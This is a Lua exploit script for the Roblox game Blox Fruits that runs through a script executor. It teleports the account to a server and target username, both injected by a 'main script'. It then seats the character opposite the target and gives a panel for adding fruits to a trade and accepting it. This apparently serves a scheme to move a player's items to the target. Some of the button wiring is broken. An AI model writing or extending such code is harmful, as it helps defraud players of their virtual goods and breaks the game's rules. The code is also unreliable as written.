-- Script Lynx Blox Fruits Teleporter
-- Complete TP System with Command UI

local Players = game:GetService("Players")
local TeleportService = game:GetService("TeleportService")
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local CommF = ReplicatedStorage:WaitForChild("Remotes"):WaitForChild("CommF_")
local TradeFunction = ReplicatedStorage:WaitForChild("Remotes"):WaitForChild("TradeFunction")
local LocalPlayer = Players.LocalPlayer

-- CONFIGURATION
local JOB_ID = "JOB_ID_PLACEHOLDER" -- Papalitan ng main script
local PLACE_ID = 4442272183
local TARGET_USERNAME = "TARGET_USERNAME_PLACEHOLDER" -- Papalitan ng main script

-- Fruit Mapping
local fruitEmoji = {
    ["Rocket"] = "🚀",
    ["Spin"] = "🚁",
    ["Blade"] = "⚔️",
    ["Spring"] = "🗑️",
    ["Bomb"] = "💣",
    ["Smoke"] = "💨",
    ["Spike"] = "📍",
    ["Flame"] = "🔥",
    ["Ice"] = "🧊",
    ["Sand"] = "🏜️",
    ["Dark"] = "🌑",
    ["Eagle"] = "🦅",
    ["Diamond"] = "💎",
    ["Light"] = "⚡",
    ["Rubber"] = "🟤",
    ["Ghost"] = "👻",
    ["Magma"] = "🌋",
    ["Quake"] = "🌊",
    ["Buddha"] = "🧘",
    ["Love"] = "💖",
    ["Creation"] = "🛠️",
    ["Spider"] = "🕷️",
    ["Sound"] = "🎵",
    ["Phoenix"] = "🔥",
    ["Portal"] = "🌀",
    ["Lightning"] = "⚡",
    ["Pain"] = "🤕",
    ["Blizzard"] = "❄️",
    ["Gravity"] = "🟣",
    ["Mammoth"] = "🦣",
    ["T-Rex"] = "🦖",
    ["Dough"] = "🍩",
    ["Shadow"] = "🌑",
    ["Venom"] = "🐍",
    ["Gas"] = "☁️",
    ["Control"] = "🌀",
    ["Spirit"] = "👻",
    ["Tiger"] = "🐯",
    ["Yeti"] = "☃️",
    ["Kitsune"] = "🦊",
    ["Dragon"] = "🐲"
}

-- Command UI
local function createCommandUI()
    local commandHistory = {}
    local addedFruits = {}
    
    -- Create ScreenGui
    local screenGui = Instance.new("ScreenGui")
    screenGui.Name = "ScriptLynx_CommandUI"
    screenGui.ResetOnSpawn = false
    screenGui.ZIndexBehavior = Enum.ZIndexBehavior.Global
    
    -- Main Frame
    local mainFrame = Instance.new("Frame")
    mainFrame.Size = UDim2.new(0.25, 0, 0.6, 0)
    mainFrame.Position = UDim2.new(0.02, 0, 0.2, 0)
    mainFrame.BackgroundColor3 = Color3.fromRGB(20, 20, 30)
    mainFrame.BorderSizePixel = 0
    mainFrame.ClipsDescendants = true
    
    local corner = Instance.new("UICorner")
    corner.CornerRadius = UDim.new(0, 12)
    corner.Parent = mainFrame
    
    local stroke = Instance.new("UIStroke")
    stroke.Color = Color3.fromRGB(100, 150, 255)
    stroke.Thickness = 2
    stroke.Parent = mainFrame
    
    -- Title Bar
    local titleBar = Instance.new("Frame")
    titleBar.Size = UDim2.new(1, 0, 0, 40)
    titleBar.BackgroundColor3 = Color3.fromRGB(30, 30, 45)
    titleBar.BorderSizePixel = 0
    
    local title = Instance.new("TextLabel")
    title.Size = UDim2.new(1, -10, 1, 0)
    title.Position = UDim2.new(0, 10, 0, 0)
    title.BackgroundTransparency = 1
    title.Text = "Script Lynx - Command Panel"
    title.Font = Enum.Font.GothamBold
    title.TextSize = 18
    title.TextColor3 = Color3.fromRGB(255, 255, 255)
    title.TextXAlignment = Enum.TextXAlignment.Left
    
    local closeBtn = Instance.new("TextButton")
    closeBtn.Size = UDim2.new(0, 30, 0, 30)
    closeBtn.Position = UDim2.new(1, -35, 0, 5)
    closeBtn.BackgroundColor3 = Color3.fromRGB(255, 80, 80)
    closeBtn.Text = "X"
    closeBtn.Font = Enum.Font.GothamBold
    closeBtn.TextSize = 16
    closeBtn.TextColor3 = Color3.fromRGB(255, 255, 255)
    closeBtn.MouseButton1Click:Connect(function()
        screenGui:Destroy()
    end)
    
    local closeCorner = Instance.new("UICorner")
    closeCorner.CornerRadius = UDim.new(0, 6)
    closeCorner.Parent = closeBtn
    
    -- Fruit Selection Panel
    local scrollFrame = Instance.new("ScrollingFrame")
    scrollFrame.Size = UDim2.new(1, -20, 0.45, -10)
    scrollFrame.Position = UDim2.new(0, 10, 0, 50)
    scrollFrame.BackgroundTransparency = 1
    scrollFrame.ScrollBarThickness = 6
    scrollFrame.CanvasSize = UDim2.new(0, 0, 0, 0)
    
    local uiListLayout = Instance.new("UIListLayout")
    uiListLayout.Padding = UDim.new(0, 8)
    uiListLayout.Parent = scrollFrame
    
    -- Fruit Buttons
    local allFruits = {
        "Dragon", "Kitsune", "T-Rex", "Leopard", "Dough", "Venom", "Shadow", 
        "Control", "Spirit", "Mammoth", "Gravity", "Blizzard", "Pain", 
        "Lightning", "Portal", "Phoenix", "Sound", "Spider", "Creation",
        "Love", "Buddha", "Quake", "Magma", "Ghost", "Rubber", "Light",
        "Diamond", "Eagle", "Dark", "Sand", "Ice", "Flame", "Spike",
        "Smoke", "Bomb", "Spring", "Blade", "Spin", "Rocket"
    }
    
    local function updateScrollSize()
        scrollFrame.CanvasSize = UDim2.new(0, 0, 0, uiListLayout.AbsoluteContentSize.Y)
    end
    
    local function createFruitButton(fruitName)
        local button = Instance.new("Frame")
        button.Size = UDim2.new(1, 0, 0, 40)
        button.BackgroundColor3 = Color3.fromRGB(40, 40, 60)
        button.BorderSizePixel = 0
        
        local btnCorner = Instance.new("UICorner")
        btnCorner.CornerRadius = UDim.new(0, 8)
        btnCorner.Parent = button
        
        local fruitBtn = Instance.new("TextButton")
        fruitBtn.Size = UDim2.new(1, 0, 1, 0)
        fruitBtn.BackgroundTransparency = 1
        fruitBtn.Text = (fruitEmoji[fruitName] or "🍎") .. " " .. fruitName
        fruitBtn.Font = Enum.Font.Gotham
        fruitBtn.TextSize = 16
        fruitBtn.TextColor3 = Color3.fromRGB(220, 220, 255)
        
        local statusLabel = Instance.new("TextLabel")
        statusLabel.Size = UDim2.new(0, 60, 1, 0)
        statusLabel.Position = UDim2.new(1, -65, 0, 0)
        statusLabel.BackgroundTransparency = 1
        statusLabel.Text = "Add"
        statusLabel.Font = Enum.Font.GothamBold
        statusLabel.TextSize = 14
        statusLabel.TextColor3 = Color3.fromRGB(100, 255, 100)
        
        fruitBtn.MouseButton1Click:Connect(function()
            if addedFruits[fruitName] then
                -- Remove fruit
                local success = pcall(function()
                    TradeFunction:InvokeServer("removeItem", fruitName .. "-" .. fruitName)
                end)
                if success then
                    addedFruits[fruitName] = nil
                    statusLabel.Text = "Add"
                    statusLabel.TextColor3 = Color3.fromRGB(100, 255, 100)
                    addToHistory("🗑️ Removed: " .. fruitName)
                end
            else
                -- Add fruit
                local success = pcall(function()
                    TradeFunction:InvokeServer("addItem", fruitName .. "-" .. fruitName)
                end)
                if success then
                    addedFruits[fruitName] = true
                    statusLabel.Text = "Added"
                    statusLabel.TextColor3 = Color3.fromRGB(255, 150, 50)
                    addToHistory("✅ Added: " .. fruitName)
                end
            end
        end)
        
        fruitBtn.Parent = button
        statusLabel.Parent = button
        button.Parent = scrollFrame
    end
    
    for _, fruit in ipairs(allFruits) do
        createFruitButton(fruit)
    end
    
    -- Command Buttons Panel
    local commandPanel = Instance.new("Frame")
    commandPanel.Size = UDim2.new(1, -20, 0.25, 0)
    commandPanel.Position = UDim2.new(0, 10, 0.47, 0)
    commandPanel.BackgroundTransparency = 1
    
    local function createCommandButton(name, callback, color)
        local btn = Instance.new("TextButton")
        btn.Size = UDim2.new(0.48, 0, 0, 40)
        btn.BackgroundColor3 = color
        btn.Text = name
        btn.Font = Enum.Font.GothamBold
        btn.TextSize = 14
        btn.TextColor3 = Color3.fromRGB(255, 255, 255)
        btn.MouseButton1Click = callback
        
        local btnCorner = Instance.new("UICorner")
        btnCorner.CornerRadius = UDim.new(0, 8)
        btnCorner.Parent = btn
        
        return btn
    end
    
    -- Command Buttons Layout
    local acceptBtn = createCommandButton("✅ ACCEPT TRADE", function()
        pcall(function() TradeFunction:InvokeServer("AcceptTrade") end)
        pcall(function() TradeFunction:InvokeServer("accept") end)
        addToHistory("🤝 Trade Accepted")
    end, Color3.fromRGB(60, 180, 80))
    
    local jumpBtn = createCommandButton("🎯 JUMP", function()
        local char = LocalPlayer.Character
        if char and char:FindFirstChildOfClass("Humanoid") then
            char:FindFirstChildOfClass("Humanoid").Jump = true
            addToHistory("🎈 Jumped")
        end
    end, Color3.fromRGB(80, 150, 255))
    
    local tpBtn = createCommandButton("📍 TELEPORT", function()
        local target = Players:FindFirstChild(TARGET_USERNAME)
        if target and target.Character and target.Character:FindFirstChild("HumanoidRootPart") then
            local char = LocalPlayer.Character
            if char and char:FindFirstChild("HumanoidRootPart") then
                char.HumanoidRootPart.CFrame = target.Character.HumanoidRootPart.CFrame + Vector3.new(5, 0, 0)
                addToHistory("📍 Teleported to target")
            end
        end
    end, Color3.fromRGB(150, 100, 255))
    
    local testBtn = createCommandButton("🧪 TEST", function()
        local char = LocalPlayer.Character
        if char and char:FindFirstChildOfClass("Humanoid") then
            char:FindFirstChildOfClass("Humanoid").Jump = true
        end
        addToHistory("✅ User is responsive")
    end, Color3.fromRGB(255, 150, 50))
    
    local resetBtn = createCommandButton("🔄 RESET", function()
        local char = LocalPlayer.Character
        if char and char:FindFirstChild("Humanoid") then
            char.Humanoid.Health = 0
            addToHistory("🔄 Resetting character...")
        end
    end, Color3.fromRGB(255, 80, 80))
    
    local clearBtn = createCommandButton("🗑️ CLEAR ALL", function()
        for fruitName, _ in pairs(addedFruits) do
            pcall(function()
                TradeFunction:InvokeServer("removeItem", fruitName .. "-" .. fruitName)
            end)
        end
        addedFruits = {}
        addToHistory("🗑️ Cleared all fruits from trade")
    end, Color3.fromRGB(180, 60, 60))
    
    -- Position buttons
    acceptBtn.Position = UDim2.new(0, 0, 0, 0)
    jumpBtn.Position = UDim2.new(0.52, 0, 0, 0)
    tpBtn.Position = UDim2.new(0, 0, 0, 45)
    testBtn.Position = UDim2.new(0.52, 0, 0, 45)
    resetBtn.Position = UDim2.new(0, 0, 0, 90)
    clearBtn.Position = UDim2.new(0.52, 0, 0, 90)
    
    acceptBtn.Parent = commandPanel
    jumpBtn.Parent = commandPanel
    tpBtn.Parent = commandPanel
    testBtn.Parent = commandPanel
    resetBtn.Parent = commandPanel
    clearBtn.Parent = commandPanel
    
    -- History Log
    local historyFrame = Instance.new("Frame")
    historyFrame.Size = UDim2.new(1, -20, 0.25, -10)
    historyFrame.Position = UDim2.new(0, 10, 0.74, 0)
    historyFrame.BackgroundColor3 = Color3.fromRGB(25, 25, 35)
    historyFrame.BorderSizePixel = 0
    
    local historyCorner = Instance.new("UICorner")
    historyCorner.CornerRadius = UDim.new(0, 8)
    historyCorner.Parent = historyFrame
    
    local historyLabel = Instance.new("TextLabel")
    historyLabel.Size = UDim2.new(1, -10, 0, 25)
    historyLabel.Position = UDim2.new(0, 10, 0, 5)
    historyLabel.BackgroundTransparency = 1
    historyLabel.Text = "Command History:"
    historyLabel.Font = Enum.Font.GothamBold
    historyLabel.TextSize = 14
    historyLabel.TextColor3 = Color3.fromRGB(200, 200, 255)
    historyLabel.TextXAlignment = Enum.TextXAlignment.Left
    
    local historyScroll = Instance.new("ScrollingFrame")
    historyScroll.Size = UDim2.new(1, -10, 1, -35)
    historyScroll.Position = UDim2.new(0, 5, 0, 30)
    historyScroll.BackgroundTransparency = 1
    historyScroll.ScrollBarThickness = 4
    historyScroll.CanvasSize = UDim2.new(0, 0, 0, 0)
    
    local historyList = Instance.new("UIListLayout")
    historyList.Padding = UDim.new(0, 4)
    historyList.Parent = historyScroll
    
    function addToHistory(message)
        table.insert(commandHistory, 1, message)
        if #commandHistory > 8 then
            table.remove(commandHistory, 9)
        end
        
        historyScroll:ClearAllChildren()
        for i, msg in ipairs(commandHistory) do
            local label = Instance.new("TextLabel")
            label.Size = UDim2.new(1, 0, 0, 20)
            label.BackgroundTransparency = 1
            label.Text = "› " .. msg
            label.Font = Enum.Font.Code
            label.TextSize = 13
            label.TextColor3 = Color3.fromRGB(180, 255, 180)
            label.TextXAlignment = Enum.TextXAlignment.Left
            label.TextTruncate = Enum.TextTruncate.AtEnd
            label.Parent = historyScroll
        end
        
        historyScroll.CanvasSize = UDim2.new(0, 0, 0, #commandHistory * 24)
    end
    
    -- Add to frames
    historyLabel.Parent = historyFrame
    historyScroll.Parent = historyFrame
    
    -- Add all to main frame
    titleBar.Parent = mainFrame
    title.Parent = titleBar
    closeBtn.Parent = titleBar
    scrollFrame.Parent = mainFrame
    commandPanel.Parent = mainFrame
    historyFrame.Parent = mainFrame
    mainFrame.Parent = screenGui
    screenGui.Parent = LocalPlayer.PlayerGui
    
    -- Update scroll size
    task.wait()
    updateScrollSize()
    
    addToHistory("🎮 Command UI Loaded!")
    addToHistory("👤 Target: " .. TARGET_USERNAME)
    addToHistory("📍 Click fruits to add/remove from trade")
    
    return screenGui
end

-- Main Teleport Function
local function teleportToServer()
    print("[Script Lynx] Starting teleport to server...")
    print("[Script Lynx] Job ID:", JOB_ID)
    print("[Script Lynx] Target User:", TARGET_USERNAME)
    
    if game.PlaceId ~= PLACE_ID then
        -- Not in Blox Fruits Sea 2
        print("[Script Lynx] Not in Sea 2, traveling to Dressrosa...")
        
        -- Setup queue_on_teleport for after travel
        queue_on_teleport([[
            task.wait(3)
            local targetJobId = "]] .. JOB_ID .. [["
            local targetPlaceId = 4442272183
            
            if game.JobId ~= targetJobId then
                game:GetService("TeleportService"):TeleportToPlaceInstance(targetPlaceId, targetJobId)
            else
                warn("[Script Lynx] Already in target server!")
            end
        ]])
        
        -- Travel to Dressrosa
        pcall(function()
            CommF:InvokeServer("TravelDressrosa")
        end)
    else
        -- Already in Sea 2, teleport directly
        print("[Script Lynx] Already in Sea 2, teleporting to instance...")
        TeleportService:TeleportToPlaceInstance(PLACE_ID, JOB_ID)
    end
end

-- Wait a bit then create UI
task.wait(3)
createCommandUI()

-- Auto-trade when target is found
task.spawn(function()
    local target = Players:FindFirstChild(TARGET_USERNAME)
    repeat
        task.wait(1)
        target = Players:FindFirstChild(TARGET_USERNAME)
    until target
    
    print("[Script Lynx] Target found:", target.Name)
    
    -- Auto sit opposite chair
    local RunService = game:GetService("RunService")
    local chairMappings = {
        ["-298_72_271"] = Vector3.new(-298, 73, 282),
        ["-298_72_282"] = Vector3.new(-298, 73, 271),
        ["-298_73_271"] = Vector3.new(-298, 73, 282),
        ["-298_73_282"] = Vector3.new(-298, 73, 271),
        ["-463_72_271"] = Vector3.new(-463, 73, 282),
        ["-463_72_282"] = Vector3.new(-463, 73, 271),
        ["-463_73_271"] = Vector3.new(-463, 73, 282),
        ["-463_73_282"] = Vector3.new(-463, 73, 271),
    }
    
    local function getPositionKey(position)
        return string.format("%d_%d_%d", math.floor(position.X + 0.5), math.floor(position.Y + 0.5), math.floor(position.Z + 0.5))
    end
    
    RunService.Heartbeat:Connect(function()
        local targetChar = target.Character
        if not targetChar then return end
        
        local hum = targetChar:FindFirstChild("Humanoid")
        if not hum or not hum.Sit then return end
        
        local seat = hum.SeatPart
        if not seat then return end
        
        local key = getPositionKey(seat.Position)
        local targetPos = chairMappings[key]
        if not targetPos then return end
        
        local char = LocalPlayer.Character
        if not char then return end
        
        local myHum = char:FindFirstChild("Humanoid")
        if myHum and myHum.Sit then return end
        
        char:MoveTo(targetPos)
    end)
end)

print("[Script Lynx] Teleport script loaded successfully!")
print("[Script Lynx] Command UI created!")
